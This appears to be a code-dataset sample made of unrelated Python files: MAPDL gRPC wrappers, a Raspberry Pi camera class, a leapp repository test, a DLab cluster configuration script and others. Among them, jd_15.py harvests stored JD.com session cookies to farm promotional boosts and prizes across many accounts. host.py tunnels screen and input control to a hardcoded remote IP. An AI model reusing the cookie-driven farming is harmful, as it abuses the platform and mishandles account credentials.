raise FileNotFoundError("No results found at %s" % result_path)
return read_binary(result_path)
@wraps(_MapdlCore.igesin)
def igesin(self, fname="", ext="", **kwargs):
"""Wrap the IGESIN command to handle the remote case."""
if self._local:
out = super().igesin(fname, ext, **kwargs)
elif not fname:
out = super().igesin(**kwargs)
elif fname in self.list_files():
# check if this file is already remote
out = super().igesin(fname, ext, **kwargs)
else:
if not os.path.isfile(fname):
raise FileNotFoundError(
f"Unable to find {fname}. You may need to"
"input the full path to the file."
)
basename = self.upload(fname, progress_bar=False)
out = super().igesin(basename, **kwargs)
return out
@wraps(_MapdlCore.cmatrix)
def cmatrix(
self, symfac="", condname="", numcond="", grndkey="", capname="", **kwargs
):
"""Run CMATRIX in non-interactive mode and return the response
from file.
"""
# The CMATRIX command needs to run in non-interactive mode
if not self._store_commands:
with self.non_interactive:
super().cmatrix(symfac, condname, numcond, grndkey, capname, **kwargs)
self._response = self._download_as_raw("cmatrix.out").decode()
return self._response
# otherwise, simply run cmatrix as we're already in
# non-interactive and there's no output to return
super().cmatrix(symfac, condname, numcond, grndkey, capname, **kwargs)
@property
def _name(self):
"""Instance unique identifier."""
if self._ip or self._port:
return f"GRPC_{self._ip}:{self._port}"
return f"GRPC_instance_{id(self)}"
def get_name(self):
return self._name
@property
def _distributed(self) -> bool:
"""MAPDL is running in distributed mode."""
if self.__distributed is None:
self.__distributed = self.parameters.numcpu > 1
return self.__distributed
@wraps(_MapdlCore.ndinqr)
def ndinqr(self, node, key, **kwargs):
"""Wrap the ``ndinqr`` method to take advantage of the gRPC methods."""
super().ndinqr(node, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.elmiqr)
def elmiqr(self, ielem, key, **kwargs):
"""Wrap the ``elmiqr`` method to take advantage of the gRPC methods."""
super().elmiqr(ielem, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.kpinqr)
def kpinqr(self, knmi, key, **kwargs):
"""Wrap the ``kpinqr`` method to take advantage of the gRPC methods."""
super().kpinqr(knmi, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.lsinqr)
def lsinqr(self, line, key, **kwargs):
"""Wrap the ``lsinqr`` method to take advantage of the gRPC methods."""
super().lsinqr(line, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.arinqr)
def arinqr(self, anmi, key, **kwargs):
"""Wrap the ``arinqr`` method to take advantage of the gRPC methods."""
super().arinqr(anmi, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.vlinqr)
def vlinqr(self, vnmi, key, **kwargs):
"""Wrap the ``vlinqr`` method to take advantage of the gRPC methods."""
super().vlinqr(vnmi, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.rlinqr)
def rlinqr(self, nreal, key, **kwargs):
"""Wrap the ``rlinqr`` method to take advantage of the gRPC methods."""
super().rlinqr(nreal, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.gapiqr)
def gapiqr(self, ngap, key, **kwargs):
"""Wrap the ``gapiqr`` method to take advantage of the gRPC methods."""
super().gapiqr(ngap, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.masiqr)
def masiqr(self, node, key, **kwargs):
"""Wrap the ``masiqr`` method to take advantage of the gRPC methods."""
super().masiqr(node, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.ceinqr)
def ceinqr(self, nce, key, **kwargs):
"""Wrap the ``ceinqr`` method to take advantage of the gRPC methods."""
super().ceinqr(nce, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.cpinqr)
def cpinqr(self, ncp, key, **kwargs):
"""Wrap the ``cpinqr`` method to take advantage of the gRPC methods."""
super().cpinqr(ncp, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.csyiqr)
def csyiqr(self, ncsy, key, **kwargs):
"""Wrap the ``csyiqr`` method to take advantage of the gRPC methods."""
super().csyiqr(ncsy, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.etyiqr)
def etyiqr(self, itype, key, **kwargs):
"""Wrap the ``etyiqr`` method to take advantage of the gRPC methods."""
super().etyiqr(itype, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.foriqr)
def foriqr(self, node, key, **kwargs):
"""Wrap the ``foriqr`` method to take advantage of the gRPC methods."""
super().foriqr(node, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.sectinqr)
def sectinqr(self, nsect, key, **kwargs):
"""Wrap the ``sectinqr`` method to take advantage of the gRPC methods."""
super().sectinqr(nsect, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.mpinqr)
def mpinqr(self, mat, iprop, key, **kwargs):
"""Wrap the ``mpinqr`` method to take advantage of the gRPC methods."""
super().mpinqr(mat, iprop, key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.dget)
def dget(self, node, idf, kcmplx, **kwargs):
"""Wrap the ``dget`` method to take advantage of the gRPC methods."""
super().dget(node, idf, kcmplx, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.fget)
def fget(self, node, idf, kcmplx, **kwargs):
"""Wrap the ``fget`` method to take advantage of the gRPC methods."""
super().fget(node, idf, kcmplx, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.erinqr)
def erinqr(self, key, **kwargs):
"""Wrap the ``erinqr`` method to take advantage of the gRPC methods."""
super().erinqr(key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
@wraps(_MapdlCore.wrinqr)
def wrinqr(self, key, **kwargs):
"""Wrap the ``wrinqr`` method to take advantage of the gRPC methods."""
super().wrinqr(key, pname=TMP_VAR, mute=True, **kwargs)
return self.scalar_param(TMP_VAR)
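    # Editor's illustrative note (not part of the original class): each wrapper
    # above stores the inquiry result in the temporary MAPDL parameter TMP_VAR
    # and returns it as a Python scalar, so callers can write, for example:
    #
    #     value = mapdl.ndinqr(node, key)   # key codes follow the MAPDL manual
    #
    # instead of issuing the command and then *GET-ing the parameter manually.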
|
rpi_camera.py
|
# ===============================================================================
# Copyright 2016 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
import os
from threading import Thread
import picamera
import picamera.array
# ============= standard library imports ========================
# ============= local library imports ==========================
import time
from pychron.core.helpers.filetools import unique_path2
from pychron.headless_config_loadable import HeadlessConfigLoadable
from pychron.paths import paths
from six.moves import map
class RPiCamera(HeadlessConfigLoadable):
sharpness = 0
contrast = 0
brightness = 50
saturation = 0
ISO = 0
video_stabilization = False
exposure_compensation = 0
# exposure modes
# off, auto, night, nightpreview, backlight, spotlight, sports, snow, beach,
# verylong, fixedfps, antishake, fireworks,
exposure_mode = "auto"
meter_mode = "average" # stop, average, backlit, matrix
# awb_modes
# off, auto, sunlight, cloudy, shade, tungsten, fluorescent, incandescent, flash, horizon
awb_mode = "auto"
# image effects
# none, negative, solarize, sketch, denoise, emboss, oilpaint, hatch,
    # gpen, pastel, watercolor, film, blur, saturation, colorswap, washedout,
# posterise, colorpoint, colorbalance, cartoon, deinterlace1, deinterlace2
image_effect = "none"
color_effects = None # (u,v)
rotation = 0 # 0,90,180,270
hflip = False
vflip = False
crop = (0.0, 0.0, 1.0, 1.0)
frame_rate = 10
def load_additional_args(self, *args, **kw):
config = self.get_configuration()
self.set_attribute(config, "sharpness", "Settings", "sharpness", cast="int")
self.set_attribute(config, "contrast", "Settings", "contrast", cast="int")
self.set_attribute(config, "brightness", "Settings", "brightness", cast="int")
self.set_attribute(config, "saturation", "Settings", "saturation", cast="int")
self.set_attribute(config, "ISO", "Settings", "ISO", cast="int")
self.set_attribute(
config,
"video_stabilization",
"Settings",
"video_stabilization",
cast="boolean",
)
self.set_attribute(
config,
"exposure_compensation",
"Settings",
"exposure_compensation",
cast="int",
)
self.set_attribute(config, "exposure_mode", "Settings", "exposure_mode")
self.set_attribute(config, "meter_mode", "Settings", "meter_mode")
self.set_attribute(config, "awb_mode", "Settings", "awb_mode")
self.set_attribute(config, "image_effect", "Settings", "image_effect")
self.set_attribute(config, "color_effects", "Settings", "color_effects")
self.set_attribute(config, "rotation", "Settings", "rotation", cast="int")
self.set_attribute(config, "hflip", "Settings", "hflip", cast="boolean")
self.set_attribute(config, "vflip", "Settings", "vflip", cast="boolean")
crop = self.config_get(config, "Settings", "crop")
if crop:
self.crop = tuple(map(float, crop.split(",")))
return True
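    # Illustrative sketch of the [Settings] section this loader expects in the
    # device configuration file (editor's addition; the option names mirror the
    # set_attribute calls above, the values are examples only):
    #
    #   [Settings]
    #   brightness = 55
    #   ISO = 400
    #   exposure_mode = auto
    #   awb_mode = auto
    #   rotation = 180
    #   hflip = True
    #   crop = 0.0, 0.0, 1.0, 1.0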
def start_video_service(self):
def func():
root = "/var/www/firm_cam"
if not os.path.isdir(root):
os.mkdir(root)
path = os.path.join(root, "image.jpg")
with picamera.PiCamera() as camera:
self._setup_camera(camera)
camera.capture(path)
while 1:
camera.capture(path)
time.sleep(1 / float(self.frame_rate))
t = Thread(target=func)
t.setDaemon(True)
t.start()
def get_image_array(self):
with picamera.PiCamera() as camera:
self._setup_camera(camera)
with picamera.array.PiRGBArray(camera) as output:
camera.capture(output, "rgb")
return output.array
def capture(self, path=None, name=None, **options):
with picamera.PiCamera() as camera:
self._setup_camera(camera)
if path is None:
                if name is None:
                    # default to an auto-named "rpi" snapshot when no name is given
                    path, _ = unique_path2(paths.snapshot_dir, "rpi", extension=".jpg")
                else:
                    path, _ = unique_path2(paths.snapshot_dir, name, extension=".jpg")
camera.capture(path, **options)
# private
def _setup_camera(self, camera):
attrs = (
"sharpness",
"contrast",
"brightness",
"saturation",
"ISO",
"video_stabilization",
"exposure_compensation",
"exposure_mode",
"meter_mode",
"awb_mode",
"image_effect",
"color_effects",
"rotation",
"hflip",
"vflip",
"crop",
)
for attr in attrs:
setattr(camera, attr, getattr(self, attr))
# ============= EOF =============================================
|
jd_15.py
|
#!/bin/env python3
# -*- coding: utf-8 -*
'''
cron: 0 59 23 * * 0 jd_15.py
new Env('Faker群友家电15周年助力');
'''
# cron
# Does not do the browsing tasks, only the boosts. It is recommended to run jd_appliances.js first, then run this script.
# export jd15_pins=["pt_pin1","pt_pin2"]
from urllib.parse import unquote, quote
import time, datetime, os, sys
import requests, json, re, random
import threading
UserAgent = ''
script_name = 'Home Appliances 15th Anniversary boost'
def printT(msg):
print("[{}]: {}".format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), msg))
sys.stdout.flush()
def delEnvs(label):
try:
if label == 'True' or label == 'yes' or label == 'true' or label == 'Yes':
return True
elif label == 'False' or label == 'no' or label == 'false' or label == 'No':
return False
except:
pass
try:
if '.' in label:
return float(label)
elif '&' in label:
return label.split('&')
elif '@' in label:
return label.split('@')
else:
return int(label)
except:
return label
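# How delEnvs() interprets environment-variable strings (editor's examples,
# derived directly from the branches above):
#   delEnvs('true')  -> True
#   delEnvs('no')    -> False
#   delEnvs('1.5')   -> 1.5
#   delEnvs('a&b')   -> ['a', 'b']
#   delEnvs('x@y')   -> ['x', 'y']
#   delEnvs('3')     -> 3
#   delEnvs('foo')   -> 'foo'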
class getJDCookie():
    # Adapt to the QingLong panel environment cookie file
def getckfile(self):
ql_new = '/ql/config/env.sh'
ql_old = '/ql/config/cookie.sh'
if os.path.exists(ql_new):
printT("当前环境青龙面板新版")
return ql_new
elif os.path.exists(ql_old):
printT("当前环境青龙面板旧版")
return ql_old
    # Get cookies
def getallCookie(self):
cookies = ''
ckfile = self.getckfile()
try:
if os.path.exists(ckfile):
with open(ckfile, "r", encoding="utf-8") as f:
cks_text = f.read()
if 'pt_key=' in cks_text and 'pt_pin=' in cks_text:
r = re.compile(r"pt_key=.*?pt_pin=.*?;", re.M | re.S | re.I)
cks_list = r.findall(cks_text)
if len(cks_list) > 0:
for ck in cks_list:
cookies += ck
return cookies
except Exception as e:
printT(f"【getCookie Error】{e}")
    # Check that the cookie format is valid
def getUserInfo(self, ck, user_order, pinName):
url = 'https://me-api.jd.com/user_new/info/GetJDUserInfoUnion?orgFlag=JD_PinGou_New&callSource=mainorder&channel=4&isHomewhite=0&sceneval=2&sceneval=2&callback='
headers = {
'Cookie': ck,
'Accept': '*/*',
'Connection': 'close',
'Referer': 'https://home.m.jd.com/myJd/home.action',
'Accept-Encoding': 'gzip, deflate, br',
'Host': 'me-api.jd.com',
'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1',
'Accept-Language': 'zh-cn'
}
try:
resp = requests.get(url=url, headers=headers, timeout=60).json()
if resp['retcode'] == "0":
nickname = resp['data']['userInfo']['baseInfo']['nickname']
return ck, nickname
else:
context = f"账号{user_order}【{pinName}】Cookie 已失效!请重新获取。"
print(context)
return ck, False
except Exception:
context = f"账号{user_order}【{pinName}】Cookie 已失效!请重新获取。"
print(context)
return ck, False
def getcookies(self):
"""
:return: cookiesList,userNameList,pinNameList
"""
cookiesList = []
pinNameList = []
nickNameList = []
cookies = self.getallCookie()
if 'pt_key=' in cookies and 'pt_pin=' in cookies:
r = re.compile(r"pt_key=.*?pt_pin=.*?;", re.M | re.S | re.I)
result = r.findall(cookies)
if len(result) >= 1:
printT("您已配置{}个账号".format(len(result)))
user_order = 1
for ck in result:
r = re.compile(r"pt_pin=(.*?);")
pinName = r.findall(ck)
pinName = unquote(pinName[0])
                    # Get the account nickname
ck, nickname = self.getUserInfo(ck, user_order, pinName)
if nickname != False:
cookiesList.append(ck)
pinNameList.append(pinName)
nickNameList.append(nickname)
user_order += 1
else:
user_order += 1
continue
if len(cookiesList) > 0:
return cookiesList, pinNameList, nickNameList
else:
printT("没有可用Cookie,已退出")
exit(4)
else:
printT("没有可用Cookie,已退出")
exit(4)
def getPinEnvs():
if "jd15_pins" in os.environ:
if len(os.environ["jd15_pins"]) != 0:
jd15_pins = os.environ["jd15_pins"]
jd15_pins = jd15_pins.replace('[', '').replace(']', '').replace('\'', '').replace(' ', '').split(',')
printT(f"已获取并使用Env环境 jd15_pins:{jd15_pins}")
return jd15_pins
else:
            printT('Please configure export jd15_pins=["pt_pin1","pt_pin2"] first')
            exit(4)
    printT('Please configure export jd15_pins=["pt_pin1","pt_pin2"] first')
exit(4)
def res_post(cookie, body):
url = "https://api.m.jd.com/api"
headers = {
"Host": "api.m.jd.com",
"content-length": "146",
"accept": "application/json, text/plain, */*",
"origin": "https://welfare.m.jd.com",
"user-agent": "jdapp;android;10.1.0;10;4636532323835366-1683336356836626;network/UNKNOWN;model/MI 8;addressid/4608453733;aid/dc52285fa836e8fb;oaid/a28cc4ac8bda0bf6;osVer/29;appBuild/89568;partner/xiaomi001;eufv/1;jdSupportDarkMode/0;Mozilla/5.0 (Linux; Android 10; MI 8 Build/QKQ1.190828.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/77.0.3865.120 MQQBrowser/6.2 TBS/045715 Mobile Safari/537.36",
"sec-fetch-mode": "cors",
"content-type": "application/x-www-form-urlencoded",
"x-requested-with": "com.jingdong.app.mall",
"sec-fetch-site": "same-site",
"referer": "https://welfare.m.jd.com/",
"accept-encoding": "gzip, deflate, br",
"accept-language": "zh-CN,zh;q\u003d0.9,en-US;q\u003d0.8,en;q\u003d0.7",
"cookie": cookie
}
body = json.dumps(body)
t = str(int(time.time() * 1000))
data = {
'appid': 'anniversary-celebra',
'functionId': 'jd_interaction_prod',
'body': body,
't': t,
'loginType': 2
}
res = requests.post(url=url, headers=headers, data=data).json()
return res
def get_share5(cookie):
body = {"type": "99", "apiMapping": "/api/supportTask/getShareId"}
res = res_post(cookie, body)
# print(res)
if '成功' in res['msg']:
return res['data']
def get_share50(cookie):
body = {"type": "100", "apiMapping": "/api/supportTask/getShareId"}
res = res_post(cookie, body)
# print(res)
if '成功' in res['msg']:
return res['data']
def getprize1(cookie,nickname):
body = {"apiMapping": "/api/prize/getCoupon"}
res = res_post(cookie, body)
# print(res)
if res['code'] == 200:
        print('------[Account: ' + nickname + ']------' + res['data']['name'])
    else:
        print('------[Account: ' + nickname + ']------coupon already claimed')
def getprize2(cookie,nickname):
body = {"apiMapping": "/api/prize/doLottery"}
res = res_post(cookie, body)
# print(res)
if res['code'] == 5011:
        print('------[Account: ' + nickname + ']------did not win an e-card')
    else:
        print('------[Account: ' + nickname + ']------result unclear, please check manually')
def help(mycookie, nickname, cookiesList, nickNameList):
shareId5 = get_share5(mycookie)
if shareId5 != None:
# print('获取5助力码成功:', shareId5)
# print('--------------------------------------开始5个助力-------------')
body1 = {"shareId": shareId5, "apiMapping": "/api/supportTask/doSupport"}
for i in range(len(cookiesList)):
res = res_post(cookiesList[i], body1)
# print(res)
try:
if res['code'] == 200 and res['data']['status'] == 7:
                    print(nickNameList[i] + ' boosted ' + nickname + ': ' + '5-person boost succeeded')
elif res['code'] == 200 and res['data']['status'] == 4:
                    print(nickNameList[i] + ' boosted ' + nickname + ': ' + 'all 5 boosts completed ----')
getprize1(mycookie,nickname)
getprize2(mycookie,nickname)
break
elif res['code'] == 200 and res['data']['status'] == 3:
                    print(nickNameList[i] + ' boosted ' + nickname + ': ' + 'already boosted on the 5-person task')
except:
pass
else:
        print('[Account: ' + nickname + '] please run the browsing task manually first')
shareId50 = get_share50(mycookie)
if shareId50 != None:
# print('获取50助力码成功:', shareId50)
# print('-------------------------------开始50个助力-------------')
body2 = {"shareId": shareId50, "apiMapping": "/api/supportTask/doSupport"}
        for i in range(len(cookiesList)):
            res = res_post(cookiesList[i], body2)
# print(res)
try:
if res['code'] == 200 and res['data']['status'] == 7:
                    print(nickNameList[i] + ' boosted ' + nickname + ': ' + '50-person boost succeeded')
elif res['code'] == 200 and res['data']['status'] == 4:
                    print(nickNameList[i] + ' boosted ' + nickname + ': ' + 'all 50 boosts completed ----')
getprize1(mycookie, nickname)
getprize2(mycookie, nickname)
break
elif res['code'] == 200 and res['data']['status'] == 3:
                    print(nickNameList[i] + ' boosted ' + nickname + ': ' + 'already boosted on the 50-person task')
except:
pass
else:
        print('[Account ' + nickname + '] please run the browsing task manually first')
def use_thread(jd15_cookies, nicks, cookiesList, nickNameList):
threads = []
for i in range(len(jd15_cookies)):
threads.append(
threading.Thread(target=help, args=(jd15_cookies[i], nicks[i], cookiesList, nickNameList))
)
for t in threads:
t.start()
for t in threads:
t.join()
def start():
printT("############{}##########".format(script_name))
jd15_pins = getPinEnvs()
get_jd_cookie = getJDCookie()
cookiesList, pinNameList, nickNameList = get_jd_cookie.getcookies()
jd15_cookies = []
nicks = []
for ckname in jd15_pins:
try:
ckNum = pinNameList.index(ckname)
jd15_cookies.append(cookiesList[ckNum])
nicks.append(nickNameList[ckNum])
except Exception as e:
try:
ckNum = pinNameList.index(unquote(ckname))
jd15_cookies.append(cookiesList[ckNum])
nicks.append(nickNameList[ckNum])
except:
print(f"请检查被助力账号【{ckname}】名称是否正确?ck是否存在?提示:助力名字可填pt_pin的值、也可以填账号名。")
continue
if len(jd15_cookies) == 0:
exit(4)
use_thread(jd15_cookies, nicks, cookiesList, nickNameList)
if __name__ == '__main__':
start()
|
test_repository.py
|
from argparse import Namespace
from multiprocessing import Process
import pytest
from leapp.repository.scan import find_and_scan_repositories, scan_repo
from helpers import make_repository_dir
from leapp.snactor.commands.new_actor import cli as new_actor_cmd
from leapp.snactor.commands.new_tag import cli as new_tag_cmd
from leapp.snactor.commands.workflow.new import cli as new_workflow_cmd
from leapp.exceptions import LeappRuntimeError
repository_empty_test_repository_dir = make_repository_dir('empty_repository_dir', scope='module')
repository_test_repository_dir = make_repository_dir('repository_dir', scope='module')
def test_empty_repo(empty_repository_dir):
with empty_repository_dir.as_cwd():
repo = scan_repo(empty_repository_dir.strpath)
repo.load(resolve=True)
assert not repo.actors
assert not repo.files
assert not repo.models
assert not repo.tags
assert not repo.topics
assert not repo.workflows
assert not repo.lookup_workflow('Any')
assert not repo.lookup_actor('Any')
def setup_repo(repository_dir):
with repository_dir.as_cwd():
new_tag_cmd(Namespace(tag_name='Test'))
new_workflow_cmd(Namespace(name='Test', class_name=None, short_name=None))
actor_path = new_actor_cmd(Namespace(
actor_name='TestActor',
tag=['TestTag', 'TestWorkflowTag'],
consumes=[],
produces=[],
))
type(repository_dir)(actor_path).join('tests', 'test_this_actor.py').write('print("I am a test")')
type(repository_dir)(actor_path).mkdir('libraries').mkdir('lib').join('__init__.py').write(
'''from subprocess import call
# This is to ensure that actor tools are available on actor library load time
assert call(['woot-tool']) == 42
# This is to ensure that common tools are available on actor library load time
assert call(['common-woot-tool']) == 42
def do():
# This must always fail - This function is crashing the actor ;-)
assert call(['woot-tool']) == 0
''')
repository_dir.mkdir('libraries').mkdir('lib').join('__init__.py').write(
'''from subprocess import call
# This is to ensure that common tools are available on common library load time
assert call(['common-woot-tool']) == 42
''')
type(repository_dir)(actor_path).mkdir('files').join('test.data').write('data')
repository_dir.mkdir('files').join('common-test.data').write('data')
tool_path = type(repository_dir)(actor_path).mkdir('tools').join('woot-tool')
woot_tool_content = '''#!/bin/bash
echo 'WOOT'
exit 42
'''
tool_path.write(woot_tool_content)
tool_path.chmod(0o755)
tool_path = repository_dir.mkdir('tools').join('common-woot-tool')
tool_path.write(woot_tool_content)
tool_path.chmod(0o755)
actor_file = type(repository_dir)(actor_path).join('actor.py')
actor_content = actor_file.read().replace('pass', '''from leapp.libraries.actor.lib import do
import leapp.libraries.common.lib
do()''')
actor_file.write(actor_content)
def test_repo(repository_dir):
setup_repo(repository_dir)
def _run_test(repo_path):
with repo_path.as_cwd():
repository = find_and_scan_repositories(repo_path.dirpath().strpath)
assert repository
repository.load(resolve=True)
import leapp.tags
assert getattr(leapp.tags, 'TestTag')
assert repository.lookup_actor('TestActor')
assert repository.lookup_workflow('TestWorkflow')
assert not repository.lookup_workflow('MissingWorkflow')
assert not repository.lookup_actor('MissingActor')
assert repository.repos
assert len(repository.dump()) >= 1
assert repository.actors
assert not repository.topics
assert not repository.models
assert repository.tags
assert repository.workflows
assert repository.tools
assert repository.libraries
assert repository.files
with pytest.raises(LeappRuntimeError):
repository.lookup_actor('TestActor')().run()
p = Process(target=_run_test, args=(repository_dir,))
p.start()
p.join()
assert p.exitcode == 0
|
host.py
|
from threading import Thread
from input_manager import InputManager
from vnc import VNC
from port_forward import ssh_tunnel
from bogus import main_account_screen
import requests
import sys
PORTS_REQUEST = 'http://136.244.115.143:4000'
status = 'None'
connection = 'None'
vnc = VNC()
input_manager = InputManager()
def start_host():
# Start port 7000 remote port 4005
port_1 = 6969
port_2 = 7000
print('Hosting...')
try:
requests.get(PORTS_REQUEST)
print(requests.get(PORTS_REQUEST))
port_remote_1 = int(requests.get(PORTS_REQUEST).headers['port'])
port_remote_2 = port_remote_1 + 1
ssh1_thread = Thread(target=ssh_tunnel, args=[port_1, port_remote_1])
ssh1_thread.daemon = True
ssh1_thread.start()
print("SSH 1 thread started")
ssh2_thread = Thread(target=ssh_tunnel, args=[port_2, port_remote_2])
ssh2_thread.daemon = True
ssh2_thread.start()
print("SSH 2 thread started")
transmit_thread = Thread(target=vnc.transmit)
transmit_thread.daemon = True
transmit_thread.start()
print("Transmit thread started")
input_thread = Thread(target=input_manager.receive_input, args=[])
input_thread.daemon = True
input_thread.start()
print("Input thread started")
transmit_thread.join()
input_thread.join()
print("Both threads joined")
except Exception as e:
print(e)
print("Nothing")
if 'only-interface' in sys.argv:
main_account_screen(True)
elif 'on-demand' in sys.argv:
start_host()
else:
main_account_screen()
start_host()
|
dataengine_configure.py
|
#!/usr/bin/python
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import json
import time
from fabric.api import *
from dlab.fab import *
from dlab.meta_lib import *
from dlab.actions_lib import *
import sys
import os
import uuid
import logging
from Crypto.PublicKey import RSA
import multiprocessing
def configure_slave(slave_number, data_engine):
slave_name = data_engine['slave_node_name'] + '{}'.format(slave_number + 1)
slave_hostname = GCPMeta().get_private_ip_address(slave_name)
try:
logging.info('[CREATING DLAB SSH USER ON SLAVE NODE]')
print('[CREATING DLAB SSH USER ON SLAVE NODE]')
params = "--hostname {} --keyfile {} --initial_user {} --os_user {} --sudo_group {}".format \
(slave_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", initial_user,
data_engine['dlab_ssh_user'], sudo_group)
try:
local("~/scripts/{}.py {}".format('create_ssh_user', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to create ssh user on slave.", str(err))
sys.exit(1)
try:
print('[INSTALLING USERs KEY ON SLAVE NODE]')
logging.info('[INSTALLING USERs KEY ON SLAVE NODE]')
additional_config = {"user_keyname": os.environ['project_name'],
"user_keydir": os.environ['conf_key_dir']}
params = "--hostname {} --keyfile {} --additional_config '{}' --user {}".format(
slave_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", json.dumps(
additional_config), data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('install_user_key', params))
except:
append_result("Failed installing users key")
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to install ssh user key on slave.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE PROXY ON SLAVE NODE]')
        print('[CONFIGURE PROXY ON SLAVE NODE]')
additional_config = {"proxy_host": edge_instance_name, "proxy_port": "3128"}
params = "--hostname {} --instance_name {} --keyfile {} --additional_config '{}' --os_user {}"\
.format(slave_hostname, slave_name, keyfile_name, json.dumps(additional_config),
data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('common_configure_proxy', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to configure proxy on slave.", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING PREREQUISITES ON SLAVE NODE]')
print('[INSTALLING PREREQUISITES ON SLAVE NODE]')
params = "--hostname {} --keyfile {} --user {} --region {} --edge_private_ip {}". \
format(slave_hostname, keyfile_name, data_engine['dlab_ssh_user'], data_engine['region'],
edge_instance_private_ip)
try:
local("~/scripts/{}.py {}".format('install_prerequisites', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed installing apps: apt & pip.", str(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to install prerequisites on slave.", str(err))
sys.exit(1)
try:
        logging.info('[CONFIGURE SLAVE NODE {}]'.format(slave_number + 1))
        print('[CONFIGURE SLAVE NODE {}]'.format(slave_number + 1))
params = "--hostname {} --keyfile {} --region {} --spark_version {} --hadoop_version {} --os_user {} " \
"--scala_version {} --r_mirror {} --master_ip {} --node_type {}". \
format(slave_hostname, keyfile_name, data_engine['region'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], data_engine['dlab_ssh_user'],
os.environ['notebook_scala_version'], os.environ['notebook_r_mirror'], master_node_hostname,
'slave')
try:
local("~/scripts/{}.py {}".format('configure_dataengine', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed configuring slave node", str(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
